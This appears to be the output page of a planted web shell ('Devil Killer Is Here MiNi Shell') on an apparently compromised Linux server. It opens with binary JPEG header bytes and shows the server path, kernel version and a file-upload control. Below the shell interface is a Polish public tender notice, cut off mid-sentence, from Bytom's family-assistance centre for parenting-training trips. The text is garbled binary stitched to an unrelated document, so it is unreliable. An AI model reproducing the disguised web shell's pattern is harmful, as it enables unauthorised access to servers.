JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210625/0009503001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00095030 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Akademia Rodziny (cz. II – III oraz V) – wyjazdowe treningi doskonalenia umiejętności rodzicielskich w ramach projektu Centrum Wsparcia Rodziny edycja I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY RODZINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003449284</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Strzelców Bytomskich 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-902</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 32 3886751</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dz@mopr.bytom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://mopr.bytom.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Akademia Rodziny (cz. II – III oraz V) – wyjazdowe treningi doskonalenia umiejętności rodzicielskich w ramach projektu Centrum Wsparcia Rodziny edycja I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ae2b6ad-d4d7-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00095030</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001778/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Treningi kompetencji społecznych w ramach projektu Centrum Wsparcia Rodziny edycja I </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: Centrum Wsparcia Rodziny edycja I, realizowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowany ze środków Europejskiego Funduszu Społecznego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mopr-bytom.logintrade.net/rejestracja/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mopr-bytom.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcami, odbywa się przy użyciu środków komunikacji elektronicznej poprzez Platformę dostępną pod adresem: https://mopr-bytom.logintrade.net/rejestracja/.<br/>2. Zamawiający zaleca Wykonawcy zamierzającemu wziąć udział w postępowaniu posiadanie konta na Platformie. Instrukcje dotyczące korzystania z Platformy (rejestracji, wymagań technicznych, zadawania pytań do postępowania, udziału w postępowaniu, w tym składania oferty) dostępne są na Platformie, w zakładce INSTRUKCJE. Skuteczne przekazanie pytania przez użytkownika niezalogowanego wymaga potwierdzenia informacji otrzymanej na skrzynkę mailową.<br/>3. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy użyciu Platformy:<br/>1)	dopuszczalne przeglądarki internetowe:<br/>a)	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>b)	Google Chrome 31,<br/>c)	Mozilla Firefox 26,<br/>d)	Opera 18;<br/>2)	pozostałe wymagania techniczne: <br/>a)	dostęp do sieci Internet,<br/>b)	obsługa przez przeglądarkę protokołu XMLHttpRequest-ajax,<br/>c)	włączona obsługa JavaScript,<br/>d)	zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>e)	zainstalowany Acrobat Reader,<br/>f)	zainstalowane środowisko uruchomieniowe Java – Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>3)	wspierane są rozwiązania dostarczane przez Firmy:<br/>a)	Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.,<br/>b)	Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby <br/>Rozliczeniowej S.A.,<br/>c)	Powszechne Centrum Certyfikacji Firmy Asseco Data Systems S.A.,<br/>d)	Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.;<br/>4)	kodowanie i oznaczanie czasu przekazania danych:<br/>Czas zapisany jest w formacie YYY-MM-DD HH:MM:SS.<br/>Czas przekazania danych (oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopi dokumentów lub oświadczeń oraz innych informacji) jest to czas ich wpływu na Platformę, a nie data wykonania danej czynności przez Wykonawcę na Platformie;<br/>5)	maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi <br/>150 MB. Większe pliki zaleca się skompresować do jednego pliku archiwum (ZIP) <br/>w celu nieprzekroczenia ww. wielkości. Zamawiający informuje, iż w oparciu o zapisy pkt 4 załącznika nr 2 do rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformacyjnych nie dopuszcza się kompresji pliku archiwum w formacie RAR. <br/>W przypadku próby zastosowania formatu kompresji RAR nie będzie możliwe jego złożenie za pomocą Platformy;<br/>6)	za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych<br/>oraz innych oświadczeń i dokumentów przyjmuje się datę ich wpływu na Platformę, <br/>a nie datę wykonania danej czynności przez Wykonawcę na Platformie;<br/>7)	do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet.<br/>4.Zamawiający dopuszcza komunikację poprzez pocztę elektroniczną na adres e’mail: dz@mopr.bytom.pl, przy czym OFERTĘ należy złożyć wyłącznie za pośrednictwem Platformy. Przekazanie wszelkiej korespondencji poprzez pocztę elektroniczną wymaga na żądanie każdej ze stron, niezwłocznego potwierdzenia faktu jej otrzymania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO, Zamawiający informuje, że:<br/>•	administratorem Pani/Pana danych osobowych jest:<br/>Dyrektor Miejskiego Ośrodka Pomocy Rodzinie ul. Strzelców Bytomskich 16, <br/>41-902 Bytom;<br/>•	dane kontaktowe inspektora ochrony Pani/Pana danych osobowych:<br/>Miejski Ośrodek Pomocy Rodzinie ul. Strzelców Bytomskich 16, 41-902 Bytom<br/>tel.: 32/388-67-37; adres mail: IOD@mopr.bytom.pl;<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego (a w przypadku dokonania wyboru złożonej oferty jako najkorzystniejszej i zawarciu umowy, także w celu związanym z realizacją zamówienia);<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz <br/>art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych <br/>(Dz. U. z 2019 r. poz. 2019 z późniejszymi zmianami), dalej „ustawy Pzp”;<br/>•	Pani/Pana dane osobowe będą przechowywane do czasu zniszczenia dokumentacji postępowania zgodnie z obowiązującymi przepisami prawa lub umową o dofinansowanie, lecz nie krócej niż przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy (zgodnie z art. 78 ust. 4 ustawy Pzp);<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>˗	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>˗	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ,<br/>˗	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO ,<br/>˗	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•	nie przysługuje Pani/Panu:<br/>˗	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>˗	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>˗	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>•	jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba, że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO;<br/>•	skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp;<br/>•	w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.2812.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie czterech wyjazdowych treningów doskonalenia umiejętności rodzicielskich w podziale na dwa moduły tematyczne. W wyjazdach będą uczestniczyć osoby wykluczone społecznie lub zagrożone wykluczeniem społecznym, będące uczestnikami/uczestniczkami projektu pn.: Centrum Wsparcia Rodziny edycja I, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego. Zamawiający wymaga, aby każdy z sześciodniowych treningów wyjazdowych odbył się w innym terminie i w sposób uregulowany szczegółowo w opisie przedmiotu zamówienia.<br/>2.	Szczegółowy opis przedmiotu zamówienia zawiera załącznik A do specyfikacji (SWZ).<br/>3.	Ogólne zasady i sposób realizacji zamówienia określają Projektowane postanowienia umowne stanowiące załącznik nr 5 do specyfikacji (SWZ).<br/>4.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy (art. 95 ustawy Pzp) wszystkich osób, które będą wykonywać prace administracyjno-biurowe związane z realizacją przedmiotu zamówienia. Ww. obowiązek nie dotyczy sytuacji, gdy powyższe prace będą wykonywać osobiście osoby samodzielnie prowadzące działalność gospodarczą (właściciel firmy/wspólnicy spółek osobowych) lub osoby fizyczne nie prowadzące działalności gospodarczej, które złożyły ofertę lub trenerzy/trenerki/opiekunowie/opiekunki wyznaczeni odpowiednio do prowadzenia zajęć/sprawowania opieki lub koordynator/-ka usługi, o których mowa <br/>w opisie przedmiotu zamówienia. Powyższe stosuje się odpowiednio <br/>do podwykonawców.<br/>Określenie sposobu weryfikacji zatrudnienia tych osób, uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnieniem tych osób oraz sankcji z tytułu nie spełnienia tych wymagań określono w Projektowanych postanowieniach umownych.<br/>5.	Zamawiający nie podzielił postępowania na części.<br/>Powody nie dokonania podziału postępowania na części:<br/>1)	niniejsze zamówienie stanowi część zamówień na usługi, które zostały objęte odrębnymi postępowaniami, a ich łączna szacowana wartość wyrażona w złotych jest mniejsza niż równowartość kwoty 750 000 euro;<br/>2)	zamówienie objęte niniejszym postępowaniem jest w pełni dostępne dla małych i średnich przedsiębiorstw, na co wskazuje jego oszacowana wartość, a warunki zamówienia określone zostały na minimalnym poziomie;<br/>3)	podział niniejszego zamówienia na części jest niecelowy ze względu na przedmiot zamówienia, który ma charakter jednolitej i spójnej całości. Dopuszczenie realizacji zamówienia w częściach wiązałby się z zagrożeniem nieosiągnięcia efektu końcowego o wymaganej jakości, ponadto, zabieg ten wiązałby się z rozbiciem odpowiedzialności wykonawczej i wprowadzeniem odmiennej jakości w obrębie tego samego typu usług, a co gorsza niezrealizowaniem części zamówienia ze względu np. na ryzyko braku ofert w danej części postępowania.<br/>6.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowej części zamówienia.<br/>7.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Wykonawca winien wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podać nazwy ewentualnych podwykonawców, jeżeli są już znani. Powierzenie podwykonawcom wykonania części zamówienia nie zwalnia Wykonawcy <br/>z odpowiedzialności za należyte wykonanie tego zamówienia.<br/>8.	Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej.<br/>9.	Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-09-05</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">według kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby skierowanej do pełnienia funkcji trenera/trenerki</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, tj.:<br/>Wykonawca winien wykazać, że:<br/>˗	jest wpisany do Rejestru Organizatorów Turystyki i Przedsiębiorców Ułatwiających Nabywanie Powiązanych Usług Turystycznych prowadzonego przez Marszałka Województwa właściwego ze względu na siedzibę Wykonawcy.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do realizacji których te zdolności są wymagane.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, tj.:<br/>1)	W ZAKRESIE DOŚWIADCZENIA WYKONAWCY:<br/>Wykonawca winien wykazać, że:<br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje, <br/>co najmniej jedną usługę polegającą na przeprowadzeniu treningu/warsztatu/szkolenia/zajęć z kompetencji/umiejętności społecznych w formie wyjazdowej o wartości usługi na kwotę, co najmniej 30.000,00 zł brutto <br/>oraz przedłożyć dowód/-y określający/-ce czy te usługi zostały wykonane lub są wykonywane należycie.<br/>W przypadku usług wykonywanych spełnienie warunku jest możliwe, gdy do dnia składania ofert nastąpiła realizacja ww. usługi na kwotę brutto jak wyżej. Oznacza to, iż w przypadku gdy przedmiot zamówienia obejmował jeszcze inne usługi należy podać wartość dotyczącą wyłącznie usługi objętej niniejszym warunkiem.<br/>Do zamówienia zrealizowanego w innej walucie niż PLN, Wykonawca winien dokonać przeliczenia wartości zgodnie ze średnim kursem NBP z dnia zawarcia umowy. <br/>W przypadku braku średniego kursu NBP z dnia zawarcia umowy należy dokonać przeliczenia podanej kwoty z waluty obcej na jej równowartość w PLN po średnim kursie NBP ostatnio obowiązującym przed dniem zawarcia umowy z podaniem daty kursu.<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, <br/>a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania 